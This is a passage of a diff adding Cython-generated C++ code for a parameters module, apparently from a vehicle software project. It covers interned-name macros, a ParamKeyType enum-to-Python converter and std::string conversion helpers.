__pyx_mstate_global->__pyx_n_s_put +#define __pyx_n_s_put_bool __pyx_mstate_global->__pyx_n_s_put_bool +#define __pyx_n_s_put_bool_nonblocking __pyx_mstate_global->__pyx_n_s_put_bool_nonblocking +#define __pyx_n_s_put_bool_nonblocking_locals_lamb __pyx_mstate_global->__pyx_n_s_put_bool_nonblocking_locals_lamb +#define __pyx_n_s_put_nonblocking __pyx_mstate_global->__pyx_n_s_put_nonblocking +#define __pyx_n_s_put_nonblocking_locals_lambda __pyx_mstate_global->__pyx_n_s_put_nonblocking_locals_lambda +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle___Pyx_EnumMeta __pyx_mstate_global->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta +#define __pyx_n_s_qualname __pyx_mstate_global->__pyx_n_s_qualname +#define __pyx_n_s_r __pyx_mstate_global->__pyx_n_s_r +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_remove __pyx_mstate_global->__pyx_n_s_remove +#define __pyx_n_s_repr __pyx_mstate_global->__pyx_n_s_repr +#define __pyx_n_s_res __pyx_mstate_global->__pyx_n_s_res +#define __pyx_kp_s_s_s __pyx_mstate_global->__pyx_kp_s_s_s +#define __pyx_kp_s_s_s_d __pyx_mstate_global->__pyx_kp_s_s_s_d +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_set_name __pyx_mstate_global->__pyx_n_s_set_name +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start +#define __pyx_n_s_state __pyx_mstate_global->__pyx_n_s_state +#define __pyx_n_s_str __pyx_mstate_global->__pyx_n_s_str +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_super __pyx_mstate_global->__pyx_n_s_super +#define __pyx_n_s_target __pyx_mstate_global->__pyx_n_s_target +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_threading __pyx_mstate_global->__pyx_n_s_threading +#define __pyx_n_s_tx_type __pyx_mstate_global->__pyx_n_s_tx_type +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_use_setstate __pyx_mstate_global->__pyx_n_s_use_setstate +#define __pyx_n_s_v __pyx_mstate_global->__pyx_n_s_v +#define __pyx_n_s_val __pyx_mstate_global->__pyx_n_s_val +#define __pyx_n_s_value __pyx_mstate_global->__pyx_n_s_value +#define __pyx_n_s_values __pyx_mstate_global->__pyx_n_s_values +#define __pyx_int_222419149 __pyx_mstate_global->__pyx_int_222419149 +#define __pyx_int_228825662 __pyx_mstate_global->__pyx_int_228825662 +#define __pyx_int_238750788 __pyx_mstate_global->__pyx_int_238750788 +#define __pyx_k__4 __pyx_mstate_global->__pyx_k__4 +#define __pyx_tuple__2 __pyx_mstate_global->__pyx_tuple__2 +#define __pyx_tuple__5 __pyx_mstate_global->__pyx_tuple__5 +#define __pyx_tuple__7 __pyx_mstate_global->__pyx_tuple__7 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_tuple__11 __pyx_mstate_global->__pyx_tuple__11 +#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 +#define __pyx_tuple__16 __pyx_mstate_global->__pyx_tuple__16 +#define __pyx_tuple__19 __pyx_mstate_global->__pyx_tuple__19 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__24 __pyx_mstate_global->__pyx_tuple__24 +#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 +#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 +#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 +#define __pyx_tuple__31 __pyx_mstate_global->__pyx_tuple__31 +#define __pyx_tuple__33 __pyx_mstate_global->__pyx_tuple__33 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 +#define __pyx_tuple__42 __pyx_mstate_global->__pyx_tuple__42 +#define __pyx_tuple__46 __pyx_mstate_global->__pyx_tuple__46 +#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 +#define __pyx_tuple__50 __pyx_mstate_global->__pyx_tuple__50 +#define __pyx_codeobj__6 __pyx_mstate_global->__pyx_codeobj__6 +#define __pyx_codeobj__8 __pyx_mstate_global->__pyx_codeobj__8 +#define __pyx_codeobj__10 __pyx_mstate_global->__pyx_codeobj__10 +#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 +#define __pyx_codeobj__14 __pyx_mstate_global->__pyx_codeobj__14 +#define __pyx_codeobj__15 __pyx_mstate_global->__pyx_codeobj__15 +#define __pyx_codeobj__17 __pyx_mstate_global->__pyx_codeobj__17 +#define __pyx_codeobj__18 __pyx_mstate_global->__pyx_codeobj__18 +#define __pyx_codeobj__20 __pyx_mstate_global->__pyx_codeobj__20 +#define __pyx_codeobj__23 __pyx_mstate_global->__pyx_codeobj__23 +#define __pyx_codeobj__25 __pyx_mstate_global->__pyx_codeobj__25 +#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 +#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 +#define __pyx_codeobj__32 __pyx_mstate_global->__pyx_codeobj__32 +#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 +#define __pyx_codeobj__37 __pyx_mstate_global->__pyx_codeobj__37 +#define __pyx_codeobj__39 __pyx_mstate_global->__pyx_codeobj__39 +#define __pyx_codeobj__41 __pyx_mstate_global->__pyx_codeobj__41 +#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 +#define __pyx_codeobj__44 __pyx_mstate_global->__pyx_codeobj__44 +#define __pyx_codeobj__45 __pyx_mstate_global->__pyx_codeobj__45 +#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 +#define __pyx_codeobj__49 __pyx_mstate_global->__pyx_codeobj__49 +/* #### Code section: module_code ### */ + +/* "EnumTypeToPy":132 + * + * @cname("__Pyx_Enum_ParamKeyType_to_py") + * cdef __Pyx_Enum_ParamKeyType_to_py(ParamKeyType c_val): # <<<<<<<<<<<<<< + * cdef object __pyx_enum + * + */ + +static PyObject *__Pyx_Enum_ParamKeyType_to_py(enum ParamKeyType __pyx_v_c_val) { + PyObject *__pyx_v___pyx_enum = 0; + int __pyx_v_underlying_c_val; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_Enum_ParamKeyType_to_py", 0); + + /* "EnumTypeToPy":137 + * + * + * __pyx_enum = ParamKeyType # <<<<<<<<<<<<<< + * + * if 0: + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_ParamKeyType); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 137, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v___pyx_enum = __pyx_t_1; + __pyx_t_1 = 0; + + /* "EnumTypeToPy":141 + * if 0: + * pass + * elif c_val == ParamKeyType.PERSISTENT: # <<<<<<<<<<<<<< + * return __pyx_enum.PERSISTENT + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + */ + __pyx_t_2 = (__pyx_v_c_val == PERSISTENT); + if (__pyx_t_2) { + + /* "EnumTypeToPy":142 + * pass + * elif c_val == ParamKeyType.PERSISTENT: + * return __pyx_enum.PERSISTENT # <<<<<<<<<<<<<< + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + * return __pyx_enum.CLEAR_ON_MANAGER_START + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v___pyx_enum, __pyx_n_s_PERSISTENT); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 142, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumTypeToPy":141 + * if 0: + * pass + * elif c_val == ParamKeyType.PERSISTENT: # <<<<<<<<<<<<<< + * return __pyx_enum.PERSISTENT + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + */ + } + + /* "EnumTypeToPy":143 + * elif c_val == ParamKeyType.PERSISTENT: + * return __pyx_enum.PERSISTENT + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_MANAGER_START + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + */ + __pyx_t_2 = (__pyx_v_c_val == CLEAR_ON_MANAGER_START); + if (__pyx_t_2) { + + /* "EnumTypeToPy":144 + * return __pyx_enum.PERSISTENT + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + * return __pyx_enum.CLEAR_ON_MANAGER_START # <<<<<<<<<<<<<< + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v___pyx_enum, __pyx_n_s_CLEAR_ON_MANAGER_START); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 144, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumTypeToPy":143 + * elif c_val == ParamKeyType.PERSISTENT: + * return __pyx_enum.PERSISTENT + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_MANAGER_START + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + */ + } + + /* "EnumTypeToPy":145 + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + * return __pyx_enum.CLEAR_ON_MANAGER_START + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + */ + __pyx_t_2 = (__pyx_v_c_val == CLEAR_ON_ONROAD_TRANSITION); + if (__pyx_t_2) { + + /* "EnumTypeToPy":146 + * return __pyx_enum.CLEAR_ON_MANAGER_START + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION # <<<<<<<<<<<<<< + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v___pyx_enum, __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 146, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumTypeToPy":145 + * elif c_val == ParamKeyType.CLEAR_ON_MANAGER_START: + * return __pyx_enum.CLEAR_ON_MANAGER_START + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + */ + } + + /* "EnumTypeToPy":147 + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + * elif c_val == ParamKeyType.ALL: + */ + __pyx_t_2 = (__pyx_v_c_val == CLEAR_ON_OFFROAD_TRANSITION); + if (__pyx_t_2) { + + /* "EnumTypeToPy":148 + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION # <<<<<<<<<<<<<< + * elif c_val == ParamKeyType.ALL: + * return __pyx_enum.ALL + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v___pyx_enum, __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 148, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumTypeToPy":147 + * elif c_val == ParamKeyType.CLEAR_ON_ONROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_ONROAD_TRANSITION + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: # <<<<<<<<<<<<<< + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + * elif c_val == ParamKeyType.ALL: + */ + } + + /* "EnumTypeToPy":149 + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + * elif c_val == ParamKeyType.ALL: # <<<<<<<<<<<<<< + * return __pyx_enum.ALL + * else: + */ + __pyx_t_2 = (__pyx_v_c_val == ALL); + if (__pyx_t_2) { + + /* "EnumTypeToPy":150 + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + * elif c_val == ParamKeyType.ALL: + * return __pyx_enum.ALL # <<<<<<<<<<<<<< + * else: + * underlying_c_val = c_val + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v___pyx_enum, __pyx_n_s_ALL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumTypeToPy":149 + * elif c_val == ParamKeyType.CLEAR_ON_OFFROAD_TRANSITION: + * return __pyx_enum.CLEAR_ON_OFFROAD_TRANSITION + * elif c_val == ParamKeyType.ALL: # <<<<<<<<<<<<<< + * return __pyx_enum.ALL + * else: + */ + } + + /* "EnumTypeToPy":152 + * return __pyx_enum.ALL + * else: + * underlying_c_val = c_val # <<<<<<<<<<<<<< + * return __pyx_enum(underlying_c_val) + * + */ + /*else*/ { + __pyx_v_underlying_c_val = ((int)__pyx_v_c_val); + + /* "EnumTypeToPy":153 + * else: + * underlying_c_val = c_val + * return __pyx_enum(underlying_c_val) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = __Pyx_PyInt_From_int(__pyx_v_underlying_c_val); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v___pyx_enum); + __pyx_t_4 = __pyx_v___pyx_enum; __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_3}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + } + + /* "EnumTypeToPy":132 + * + * @cname("__Pyx_Enum_ParamKeyType_to_py") + * cdef __Pyx_Enum_ParamKeyType_to_py(ParamKeyType c_val): # <<<<<<<<<<<<<< + * cdef object __pyx_enum + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("EnumTypeToPy.__Pyx_Enum_ParamKeyType_to_py", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_enum); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyObject_string_to_py_std__in_string", 0); + + /* "string.to_py":32 + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyUnicode_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyObject_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyUnicode_string_to_py_std__in_string", 0); + + /* "string.to_py":38 + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyStr_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyUnicode_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyUnicode_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyStr_string_to_py_std__in_string", 0); + + /* "string.to_py":44 + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyBytes_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyStr_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyStr_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyBytes_string_to_py_std__in_string", 0); + + /* "string.to_py":50 + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyByteArray_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyBytes_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + 